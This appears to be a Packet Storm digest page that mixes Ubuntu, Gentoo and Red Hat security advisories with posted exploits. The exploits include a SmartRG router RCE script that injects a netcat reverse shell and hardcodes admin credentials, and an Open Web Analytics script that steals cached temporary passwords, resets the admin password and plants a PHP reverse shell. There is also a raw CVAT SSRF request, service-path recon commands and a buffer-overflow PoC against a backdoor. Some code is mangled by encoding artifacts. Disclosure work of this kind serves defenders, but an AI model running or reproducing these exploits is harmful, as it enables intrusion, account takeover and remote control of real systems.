Ubuntu Security Notice 5721-1 - It was discovered that WavPack was not properly performing checks when dealing with memory. If a user were tricked into decompressing a specially crafted WavPack Audio File, an attacker could possibly use this issue to cause the WavPack decompressor to crash, resulting in a denial of service.

    ==========================================================================Ubuntu Security Notice USN-5721-1November 10, 2022wavpack vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 16.04 ESMSummary:WavPack could be made to crash if it opened a specially craftedfile.Software Description:- wavpack: audio codec (lossy and lossless) - encoder and decoderDetails:It was discovered that WavPack was not properly performing checkswhen dealing with memory. If a user were tricked into decompressing aspecially crafted WavPack Audio File, an attacker could possibly usethis issue to cause the WavPack decompressor to crash, resulting in adenial of service.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 16.04 ESM:   libwavpack1                     4.75.2-2ubuntu0.2+esm1   wavpack                         4.75.2-2ubuntu0.2+esm1In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-5721-1   CVE-2022-2476

Ubuntu Security Notice USN-5721-1

SmartRG Router SR510n version 2.6.13 suffers from a remote code execution vulnerability.

    # Exploit Title: SmartRG Router SR510n 2.6.13 - RCE (Remote Code Execution)# Date: 13/06/2022# Exploit Author: Yerodin Richards# Vendor Homepage: https://adtran.com# Version: 2.5.15 / 2.6.13 (confirmed)# Tested on: SR506n (2.5.15) & SR510n (2.6.13)# CVE : CVE-2022-37661import requestsfrom subprocess import Popen, PIPErouter_host =3D "http://192.168.1.1"authorization_header =3D "YWRtaW46QWRtMW5ATDFtMyM=3D"lhost =3D "lo"lport =3D 80payload_port =3D 81def main():    e_proc =3D Popen(["echo", f"rm /tmp/s & mknod /tmp/s p & /bin/sh 0< /tm=p/s | nc {lhost} {lport} > /tmp/s"], stdout=3DPIPE)    Popen(["nc", "-nlvp", f"{payload_port}"], stdin=3De_proc.stdout)    send_payload(f"|nc {lhost} {payload_port}|sh")    print("done.. check shell")def get_session():    url =3D router_host + "/admin/ping.html"    headers =3D {"Authorization": "Basic {}".format(authorization_header)}    r =3D requests.get(url, headers=3Dheaders).text    i =3D r.find("&sessionKey=3D") + len("&sessionKey=3D")    s =3D ""    while r[i] !=3D "'":        s =3D s + r[i]        i =3D i + 1    return sdef send_payload(payload):    print(payload)    url =3D router_host + "/admin/pingHost.cmd"    headers =3D {"Authorization": "Basic {}".format(authorization_header)}    params =3D {"action": "add", "targetHostAddress": payload, "sessionKey"=: get_session()}    requests.get(url, headers=3Dheaders, params=3Dparams).textmain()

SmartRG Router SR510n 2.6.13 Remote Code Execution

Gentoo Linux Security Advisory 202211-2 - A vulnerability has been found in lesspipe which could result in arbitrary code execution. Versions less than 2.06 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202211-02  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: lesspipe: Arbitrary Code Exeecution  
     Date: November 10, 2022  
     Bugs: #865631  
       ID: 202211-02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been found in lesspipe which could result in  
arbitrary code execution.

Background  
==========

lesspipe is a preprocessor for less.

Affected packages  
=================

    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  app-text/lesspipe          < 2.06                        >= 2.06

Description  
===========

lesspipe has support for parsing Perl storable ("PST") files,

Impact  
======

A crafted Perl storable file which is passed into lesspipe could result  
in arbitrary code execution.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All lesspipe users should update to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-text/lesspipe-2.06"

References  
==========

[ 1 ] CVE-2022-44542  
      https://nvd.nist.gov/vuln/detail/CVE-2022-44542

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202211-02

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202211-02

CVAT version 2.0 suffers from a server-side request forgery vulnerability.

    #Exploit Title: CVAT 2.0 - SSRF (Server Side Request Forgery)#Exploit Author: Emir Polat#Vendor Homepage: https://github.com/opencv/cvat#Version: < 2.0.0#Tested On: Version 1.7.0 - Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-122-generic x86_64)#CVE: CVE-2022-31188# Description:#CVAT is an opensource interactive video and image annotation tool for computer vision. Versions prior to 2.0.0 were found to be subject to a Server-side request forgery (SSRF) vulnerability. #Validation has been added to urls used in the affected code path in version 2.0.0. Users are advised to upgrade.POST /api/v1/tasks/2/data HTTP/1.1Host: localhost:8080User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:97.0) Gecko/20100101 Firefox/97.0Accept: application/json, text/plain, */*Accept-Language:en-US,en;q=0.5Accept-Encoding: gzip, deflateAuthorization: Token 06d88f739a10c7533991d8010761df721b790b7X-CSRFTOKEN:65s9UwX36e9v8FyiJi0KEzgMigJ5pusEK7dU4KSqgCajSBAYQxKDYCOEVBUhnIGVContent-Type: multipart/form-data; boundary=-----------------------------251652214142138553464236533436Content-Length: 569Origin: http://localhost:8080Connection: closeReferer:http://localhost:8080/tasks/createCookie: csrftoken=65s9UwX36e9v8FyiJi0KEzgMigJ5pusEK7dU4KSqgCajSBAYQxKDYCOEVBUhnIGv; sessionid=dzks19fhlfan8fgq0j8j5toyrh49dnedSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-origin-----------------------------251652214142138553464236533436Content-Disposition: form-data; name="remote files[0]"http://localhost:8081-----------------------------251652214142138553464236533436Content-Disposition: form-data; name=" image quality"170-----------------------------251652214142138553464236533436Content-Disposition: form-data; name="use zip chunks"true-----------------------------251652214142138553464236533436Content-Disposition: form-data; name="use cache"true-----------------------------251652214142138553464236533436--

CVAT 2.0 Server-Side Request Forgery

Ubuntu Security Notice 5709-2 - USN-5709-1 fixed vulnerabilities in Firefox. The update introduced several minor regressions. This update fixes the problem. Multiple security issues were discovered in Firefox. If a user were tricked into opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service, obtain sensitive information across domains, or execute arbitrary code. It was discovered that Firefox saved usernames to a plaintext file. A local user could potentially exploit this to obtain sensitive information.

==========================================================================  
Ubuntu Security Notice USN-5709-2  
November 10, 2022

firefox vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS

Summary:

USN-5709-1 introduced minor regressions in Firefox

Software Description:  
- firefox: Mozilla Open Source web browser

Details:

USN-5709-1 fixed vulnerabilities in Firefox. The update introduced  
several minor regressions. This update fixes the problem.

We apologize for the inconvenience.

Original advisory details:

 Multiple security issues were discovered in Firefox. If a user were  
 tricked into opening a specially crafted website, an attacker could  
 potentially exploit these to cause a denial of service, obtain sensitive  
 information across domains, or execute arbitrary code. (CVE-2022-42927,  
 CVE-2022-42928, CVE-2022-42929, CVE-2022-42930, CVE-2022-42932)

  It was discovered that Firefox saved usernames to a plaintext file. A  
 local user could potentially exploit this to obtain sensitive information.  
 (CVE-2022-42931)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 20.04 LTS:  
  firefox                         106.0.5+build1-0ubuntu0.20.04.1

Ubuntu 18.04 LTS:  
  firefox                         106.0.5+build1-0ubuntu0.18.04.1

After a standard system update you need to restart Firefox to make  
all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-5709-2  
  https://ubuntu.com/security/notices/USN-5709-1  
  https://launchpad.net/bugs/1996178

Package Information:  
  https://launchpad.net/ubuntu/+source/firefox/106.0.5+build1-0ubuntu0.20.04.1  
  https://launchpad.net/ubuntu/+source/firefox/106.0.5+build1-0ubuntu0.18.04.1

Ubuntu Security Notice USN-5709-2

IOTransfer version 4 suffers from an unquoted service path vulnerability.

    # Exploit Title: IOTransfer V4 - Unquoted Service Path# Exploit Author: BLAY ABU SAFIAN (Inveteck Global)# Discovery Date: 2022-28-07# Vendor Homepage: http://www.iobit.com/en/index.php# Software Link: https://iotransfer.itopvpn.com/download/# Tested Version: V4# Vulnerability Type: Unquoted Service Path# Tested on OS: Microsoft Windows Server 2019 Standard Evaluation CVE-2022-37197# Step to discover Unquoted Service Path:C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """IOTransfer Updater IOTUpdaterSvc C:\Program Files (x86)\IOTransfer\Updater\IOTUpdater.exe                      AutoC:\>sc qc IOTUpdaterSvc[SC] QueryServiceConfig SUCCESSSERVICE_NAME: IOTUpdaterSvc        TYPE : 10 WIN32_OWN_PROCESS        START_TYPE : 2 AUTO_START        ERROR_CONTROL : 1 NORMAL        BINARY_PATH_NAME : C:\Program Files (x86)\IOTransfer\Updater\IOTUpdater.exeLOAD_ORDER_GROUP :        TAG : 0        DISPLAY_NAME : IOTransfer Updater        DEPENDENCIES :        SERVICE_START_NAME : LocalSystemC:\>systeminfoOS Name: Microsoft Windows Server 2019 Standard EvaluationOS Version: 10.0.17763 N/A Build 17763OS Manufacturer: Microsoft Corporation

IOTransfer 4 Unquoted Service Path

Open Web Analytics version 1.7.3 remote code execution exploit.

    # Exploit Title: Open Web Analytics 1.7.3 - Remote Code Execution (RCE)# Date: 2022-08-30# Exploit Author: Jacob Ebben# Vendor Homepage: https://www.openwebanalytics.com/# Software Link: https://github.com/Open-Web-Analytics# Version: <1.7.4# Tested on: Linux # CVE : CVE-2022-24637import argparseimport requestsimport base64import reimport randomimport stringimport hashlibfrom termcolor import coloreddef print_message(message, type):   if type == 'SUCCESS':      print('[' + colored('SUCCESS', 'green') +  '] ' + message)   elif type == 'INFO':      print('[' + colored('INFO', 'blue') +  '] ' + message)   elif type == 'WARNING':      print('[' + colored('WARNING', 'yellow') +  '] ' + message)   elif type == 'ALERT':      print('[' + colored('ALERT', 'yellow') +  '] ' + message)   elif type == 'ERROR':      print('[' + colored('ERROR', 'red') +  '] ' + message)def get_normalized_url(url):   if url[-1] != '/':      url += '/'   if url[0:7].lower() != 'http://' and url[0:8].lower() != 'https://':      url = "http://" + url   return urldef get_proxy_protocol(url):   if url[0:8].lower() == 'https://':      return 'https'   return 'http'def get_random_string(length):   chars = string.ascii_letters + string.digits   return ''.join(random.choice(chars) for i in range(length))def get_cache_content(cache_raw):   regex_cache_base64 = r'\*(\w*)\*'   regex_result = re.search(regex_cache_base64, cache_raw)   if not regex_result:      print_message('The provided URL does not appear to be vulnerable ...', "ERROR")      exit()   else:      cache_base64 = regex_result.group(1)   return base64.b64decode(cache_base64).decode("ascii")def get_cache_username(cache):   regex_cache_username = r'"user_id";O:12:"owa_dbColumn":11:{s:4:"name";N;s:5:"value";s:5:"(\w*)"'   return re.search(regex_cache_username, cache).group(1)def get_cache_temppass(cache):   regex_cache_temppass = r'"temp_passkey";O:12:"owa_dbColumn":11:{s:4:"name";N;s:5:"value";s:32:"(\w*)"'   return re.search(regex_cache_temppass, cache).group(1)def get_update_nonce(url):   try:      update_nonce_request = session.get(url, proxies=proxies)      regex_update_nonce = r'owa_nonce" value="(\w*)"'      update_nonce = re.search(regex_update_nonce, update_nonce_request.text).group(1)   except Exception as e:      print_message('An error occurred when attempting to update config!', "ERROR")      print(e)      exit()   else:      return update_nonceparser = argparse.ArgumentParser(description='Exploit for CVE-2022-24637: Unauthenticated RCE in Open Web Analytics (OWA)')parser.add_argument('TARGET', type=str,                   help='Target URL (Example: http://localhost/owa/ or https://victim.xyz:8000/)')parser.add_argument('ATTACKER_IP', type=str,                   help='Address for reverse shell listener on attacking machine')parser.add_argument('ATTACKER_PORT', type=str,                   help='Port for reverse shell listener on attacking machine')parser.add_argument('-u', '--username', default="admin", type=str,                  help='The username to exploit (Default: admin)')parser.add_argument('-p','--password', default=get_random_string(32), type=str,                  help='The new password for the exploited user')parser.add_argument('-P','--proxy', type=str,                  help='HTTP proxy address (Example: http://127.0.0.1:8080/)')parser.add_argument('-c', '--check', action='store_true',                  help='Check vulnerability without exploitation')args = parser.parse_args()base_url = get_normalized_url(args.TARGET)login_url = base_url + "index.php?owa_do=base.loginForm"password_reset_url = base_url + "index.php?owa_do=base.usersPasswordEntry"update_config_url = base_url + "index.php?owa_do=base.optionsGeneral"username = args.usernamenew_password = args.passwordreverse_shell = '<?php $sock=fsockopen("' + args.ATTACKER_IP + '",'+ args.ATTACKER_PORT + ');$proc=proc_open("sh", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);?>'shell_filename = get_random_string(8) + '.php'shell_url = base_url + 'owa-data/caches/' + shell_filenameif args.proxy:   proxy_url = get_normalized_url(args.proxy)   proxy_protocol = get_proxy_protocol(proxy_url)   proxies = { proxy_protocol: proxy_url }else:   proxies = {}session = requests.Session()try:   mainpage_request = session.get(base_url, proxies=proxies)except Exception as e:   print_message('Could not connect to "' + base_url, "ERROR")   exit()else:   print_message('Connected to "' + base_url + '" successfully!', "SUCCESS")if 'Open Web Analytics' not in mainpage_request.text:   print_message('Could not confirm whether this website is hosting OWA! Continuing exploitation...', "WARNING")elif 'version=1.7.3' not in mainpage_request.text:   print_message('Could not confirm whether this OWA instance is vulnerable! Continuing exploitation...', "WARNING")else:   print_message('The webserver indicates a vulnerable version!', "ALERT")try:   data = {      "owa_user_id": username,       "owa_password": username,       "owa_action": "base.login"   }   session.post(login_url, data=data, proxies=proxies)except Exception as e:   print_message('An error occurred during the login attempt!', "ERROR")   print(e)   exit()else:   print_message('Attempting to generate cache for "' + username + '" user', "INFO")print_message('Attempting to find cache of "' + username + '" user', "INFO")found = Falsefor key in range(100):   user_id = 'user_id' + str(key)   userid_hash = hashlib.md5(user_id.encode()).hexdigest()    filename = userid_hash + '.php'   cache_url = base_url + "owa-data/caches/" + str(key) + "/owa_user/" + filename   cache_request = requests.get(cache_url, proxies=proxies)   if cache_request.status_code != 200:      continue;   cache_raw = cache_request.text   cache = get_cache_content(cache_raw)   cache_username = get_cache_username(cache)   if cache_username != username:      print_message('The temporary password for a different user was found. "' + cache_username + '": ' + get_cache_temppass(cache), "INFO")      continue;   else:      found = True      breakif not found:   print_message('No cache found. Are you sure "' + username + '" is a valid user?', "ERROR")   exit()cache_temppass = get_cache_temppass(cache)print_message('Found temporary password for user "' + username + '": ' + cache_temppass, "INFO")if args.check:   print_message('The system appears to be vulnerable!', "ALERT")   exit()try:   data = {      "owa_password": new_password,       "owa_password2": new_password,       "owa_k": cache_temppass,       "owa_action":       "base.usersChangePassword"   }   session.post(password_reset_url, data=data, proxies=proxies)except Exception as e:   print_message('An error occurred when changing the user password!', "ERROR")   print(e)   exit()else:   print_message('Changed the password of "' + username + '" to "' + new_password + '"', "INFO")try:   data = {      "owa_user_id": username,       "owa_password": new_password,       "owa_action": "base.login"   }   session.post(login_url, data=data, proxies=proxies)except Exception as e:   print_message('An error occurred during the login attempt!', "ERROR")   print(e)   exit()else:   print_message('Logged in as "' + username + '" user', "SUCCESS")nonce = get_update_nonce(update_config_url)try:   log_location = "/var/www/html/owa/owa-data/caches/" + shell_filename   data = {      "owa_nonce": nonce,       "owa_action": "base.optionsUpdate",       "owa_config[base.error_log_file]": log_location,       "owa_config[base.error_log_level]": 2   }   session.post(update_config_url, data=data, proxies=proxies)except Exception as e:   print_message('An error occurred when attempting to update config!', "ERROR")   print(e)   exit()else:   print_message('Creating log file', "INFO")nonce = get_update_nonce(update_config_url)try:   data = {      "owa_nonce": nonce,       "owa_action": "base.optionsUpdate",       "owa_config[shell]": reverse_shell    }   session.post(update_config_url, data=data, proxies=proxies)except Exception as e:   print_message('An error occurred when attempting to update config!', "ERROR")   print(e)   exit()else:   print_message('Wrote payload to log file', "INFO")try:   session.get(shell_url, proxies=proxies)except Exception as e:   print(e)else:   print_message('Triggering payload! Check your listener!', "SUCCESS")   print_message('You can trigger the payload again at "' + shell_url + '"' , "INFO")

Open Web Analytics 1.7.3 Remote Code Execution

Red Hat Security Advisory 2022-7434-01 - A Red Hat OpenShift security update has been provided for the Logging Subsystem.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: Logging Subsystem 5.5.4 - Red Hat OpenShift security update  
Advisory ID:       RHSA-2022:7434-01  
Product:           Logging Subsystem for Red Hat OpenShift  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:7434  
Issue date:        2022-11-10  
CVE Names:         CVE-2020-35525 CVE-2020-35527 CVE-2022-0494  
                   CVE-2022-1353 CVE-2022-2509 CVE-2022-2588  
                   CVE-2022-3515 CVE-2022-21618 CVE-2022-21619  
                   CVE-2022-21624 CVE-2022-21626 CVE-2022-21628  
                   CVE-2022-23816 CVE-2022-23825 CVE-2022-29900  
                   CVE-2022-29901 CVE-2022-32149 CVE-2022-37434  
                   CVE-2022-39399 CVE-2022-40674  
====================================================================  
1. Summary:

Logging Subsystem 5.5.4 - Red Hat OpenShift

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

Logging Subsystem 5.5.4 - Red Hat OpenShift

Security Fix(es):

* golang: golang.org/x/text/language: ParseAcceptLanguage takes a long time  
to parse complex tags (CVE-2022-32149)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

For OpenShift Container Platform 4.11 see the following documentation,  
which will be updated shortly for this release, for important instructions  
on how to upgrade your cluster and fully apply this errata update:

https://docs.openshift.com/container-platform/4.11/release_notes/ocp-4-11-release-notes.html

For Red Hat OpenShift Logging 5.5, see the following instructions to apply  
this update:

https://docs.openshift.com/container-platform/4.11/logging/cluster-logging-upgrading.html

4. Bugs fixed (https://bugzilla.redhat.com/):

2134010 - CVE-2022-32149 golang: golang.org/x/text/language: ParseAcceptLanguage takes a long time to parse complex tags

5. JIRA issues fixed (https://issues.jboss.org/):

LOG-2674 - Many `can't remove non-existent inotify watch for: /var/log/pods/xxxxxx` errors in logfilesmetricexporter container.  
LOG-3042 - Logging view plugin removes part of LogQL query  
LOG-3049 - [release-5.5] Resources associated with collector / fluentd keep on getting recreated  
LOG-3127 - The alerts are Fluentd when type=vector  
LOG-3138 - [release-5.5] the content of secret elasticsearch-metrics-token is recreated continually  
LOG-3175 - [release-5.5] Vector healthcheck fails when forwarding logs to Cloudwatch  
LOG-3213 - must-gather is empty for logging with CLO image  
LOG-3234 - [release-5.5] Loki gateway is crashing because cipher-suites are not set  
LOG-3251 - [release-5.5] Adding Valid Subscription Annotation

6. References:

https://access.redhat.com/security/cve/CVE-2020-35525  
https://access.redhat.com/security/cve/CVE-2020-35527  
https://access.redhat.com/security/cve/CVE-2022-0494  
https://access.redhat.com/security/cve/CVE-2022-1353  
https://access.redhat.com/security/cve/CVE-2022-2509  
https://access.redhat.com/security/cve/CVE-2022-2588  
https://access.redhat.com/security/cve/CVE-2022-3515  
https://access.redhat.com/security/cve/CVE-2022-21618  
https://access.redhat.com/security/cve/CVE-2022-21619  
https://access.redhat.com/security/cve/CVE-2022-21624  
https://access.redhat.com/security/cve/CVE-2022-21626  
https://access.redhat.com/security/cve/CVE-2022-21628  
https://access.redhat.com/security/cve/CVE-2022-23816  
https://access.redhat.com/security/cve/CVE-2022-23825  
https://access.redhat.com/security/cve/CVE-2022-29900  
https://access.redhat.com/security/cve/CVE-2022-29901  
https://access.redhat.com/security/cve/CVE-2022-32149  
https://access.redhat.com/security/cve/CVE-2022-37434  
https://access.redhat.com/security/cve/CVE-2022-39399  
https://access.redhat.com/security/cve/CVE-2022-40674  
https://access.redhat.com/security/updates/classification/#moderate

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY2ygY9zjgjWX9erEAQjsqhAAnWipfbePJjzeNKhBdSB8+KuuFOdDosVl  
TM83jx5ov3yumRWxBORPOlN85R1Pfw2Kh7kT669wrbDL91YUU9WTYlONhiubL/oa  
MR5Eq6TscAzh1aiy1BRZporGnddlpX5xNmHxl0G65CwisChuB8aom5uR0kymu8V1  
4oH5wScZKshX9HgAylMerT7mO31Ya3xKOCPx9j39jP1G1DFM1c5NwYqHPVt3ioLJ  
4kwnkt59USHi4AHxj9ELEJ2lHBNF9QTD7BITNuWITac+sCK55OEWKjLzerE7yaNy  
4ZGy0ERDwRPScnVSnvtsZYGcuJPAth9eX7c9hxwDxiCdTL5nli0NI5e3MuU3gU/W  
yBsDFe8DDi/bnzSw5T8ofT5IfOyc/6PuncZUO3QKF/fGwaN/xD+0Gj5+J7kZKTnq  
lxbBOPpn52omWVDittRYxAouYn++CEHbJsUIznJDLOMKYXjuhZ/ERePl0pZAeiao  
CScdIGNt6fDFCzNSYgdXJGbw/NPqYSQNpsJjzM2TdwVxaOguVRKXm5EJR7cTJzXm  
hA3H3BlP0Bzq5UsW4GifQF3jyv6tOQFd/mMvGv3d+08S/JUKKCzJBdlp9nw6eXqp  
TV+8Q4YCRXU5enul8DZGfKH7P7UYvSZ+cBBhxIkcnkhs2MT21ezopxubJs5KG035  
qXp/7zyXsVs=t8JW  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-7434-01

Chrome suffers from a password_manager::WellKnownChangePasswordState::SetChangePasswordResponseCode heap use-after-free vulnerability.

Chrome password_manager::WellKnownChangePasswordState::SetChangePasswordResponseCode Use-After-Free

Backdoor.Win32.Aphexdoor.LiteSock malware suffers from a buffer overflow vulnerability.

Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022  
Original source: https://malvuln.com/advisory/2047ac6183da4dfb61d2562721ba0720.txt  
Contact: malvuln13@gmail.com  
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Aphexdoor.LiteSock  
Vulnerability: Remote Stack Buffer Overflow (SEH)  
Description: The malware drops an extensionless PE file named "3" which listens on TCP port 1080. Third-party attackers who can reach an infected host can send a specially crafted packet to port 1080, that will trigger a stack buffer overflow overwriting ECX register and SEH.  
Family: Aphexdoor  
Type: PE32  
MD5: 2047ac6183da4dfb61d2562721ba0720  
Vuln ID: MVID-2022-0653  
Dropped files: "3"  
ASLR: False  
DEP: False  
CFG: False  
Safe SEH: False  
Disclosure: 11/09/2022

Memory Dump:  
(135c.27c8): Access violation - code c0000005 (first/second chance not available)  
eax=00000000 ebx=00000000 ecx=41414141 edx=77729d70 esi=02651848 edi=02651d0c  
eip=7770e916 esp=02651790 ebp=02651830 iopl=0         nv up ei pl nz ac pe nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000216  
ntdll!ZwQueryInformationProcess+0x26:  
7770e916 c21400          ret     14h

0:004> .ecxr  
eax=00000000 ebx=00000000 ecx=41414141 edx=77729d70 esi=02651848 edi=02651d0c  
eip=7770e916 esp=02651790 ebp=02651830 iopl=0         nv up ei pl nz ac pe nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000216  
ntdll!ZwQueryInformationProcess+0x26:  
7770e916 c21400          ret     14h

0:004> !analyze -v  
*******************************************************************************  
*                                                                             *  
*                        Exception Analysis                                   *  
*                                                                             *  
*******************************************************************************

*** WARNING: Unable to verify checksum for 3  
*** ERROR: Module load completed but symbols could not be loaded for 3  
Failed calling InternetOpenUrl, GLE=12029

FAULTING_IP:   
+26  
312e312f ??              ???

EXCEPTION_RECORD:  0274fadc -- (.exr 0x274fadc)  
ExceptionAddress: 312e312f  
   ExceptionCode: c0000005 (Access violation)  
  ExceptionFlags: 00000000  
NumberParameters: 2  
   Parameter[0]: 00000000  
   Parameter[1]: 312e312f  
Attempt to read from address 312e312f

PROCESS_NAME:  3

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_PARAMETER1:  00000001

EXCEPTION_PARAMETER2:  02650fe8

WRITE_ADDRESS:  02650fe8 

FOLLOWUP_IP:   
+26  
51bb743d e89efdffff      call    51bb71e0

FAILED_INSTRUCTION_ADDRESS:   
+26  
41414141 ??              ???

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG:  0

APPLICATION_VERIFIER_FLAGS:  0

CONTEXT:  0274fb2c -- (.cxr 0x274fb2c)  
eax=00000001 ebx=00000234 ecx=72b87bf5 edx=00000001 esi=004011a8 edi=004011a8  
eip=312e312f esp=0274ff8c ebp=50545448 iopl=0         nv up ei pl nz na po nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202  
312e312f ??              ???  
Resetting default scope

ADDITIONAL_DEBUG_TEXT:  Followup set based on attribute [Is_ChosenCrashFollowupThread] from Frame:[0] on thread:[PSEUDO_THREAD]

LAST_CONTROL_TRANSFER:  from 203a7473 to 312e312f

FAULTING_THREAD:  ffffffff

DEFAULT_BUCKET_ID:  STACKIMMUNE

PRIMARY_PROBLEM_CLASS:  STACKIMMUNE

BUGCHECK_STR:  APPLICATION_FAULT_STACKIMMUNE_STACK_OVERFLOW_BAD_INSTRUCTION_PTR_INVALID_POINTER_WRITE_EXPLOITABLE_FILL_PATTERN_41414141

IP_ON_HEAP:  203a7473  
The fault address in not in any loaded module, please check your build's rebase  
log at <releasedir>\bin\build_logs\timebuild\ntrebase.log for module which may  
contain the address if it were loaded.

IP_IN_FREE_BLOCK: 203a7473

FRAME_ONE_INVALID: 1

STACK_TEXT:    
00000000 00000000 3+0x0

STACK_COMMAND:  .cxr 000000000274FB2C ; kb ; ** Pseudo Context ** ; kb

SYMBOL_NAME:  3

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: 3

DEBUG_FLR_IMAGE_TIMESTAMP:  21475346

FAILURE_BUCKET_ID:  STACKIMMUNE_c0000005_3!Unknown

BUCKET_ID:  APPLICATION_FAULT_STACKIMMUNE_STACK_OVERFLOW_BAD_INSTRUCTION_PTR_INVALID_POINTER_WRITE_EXPLOITABLE_FILL_PATTERN_41414141_BAD_IP_3

0:004> !exchain  
0265175c: ntdll!ExecuteHandler2+44 (77729d70)  
0274ffcc: 41414141  
Invalid exception stack at 41414141

Exploit/PoC:  
from socket import *

MALWARE_HOST="x.x.x.x"  
PORT=1080

s=socket(AF_INET, SOCK_STREAM)  
s.connect((MALWARE_HOST, PORT))

PAYLOAD="TRACE /"+"A"*72+" HTTP/1.1\r\nHost: "+MALWARE_HOST+"\r\n\X-Request-ID: "+"A"*72

s.send(PAYLOAD.encode())  
s.close()  
print("Aphexdoor.LiteSock Buffer Overflow by Malvuln")

Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Source

Packet Storm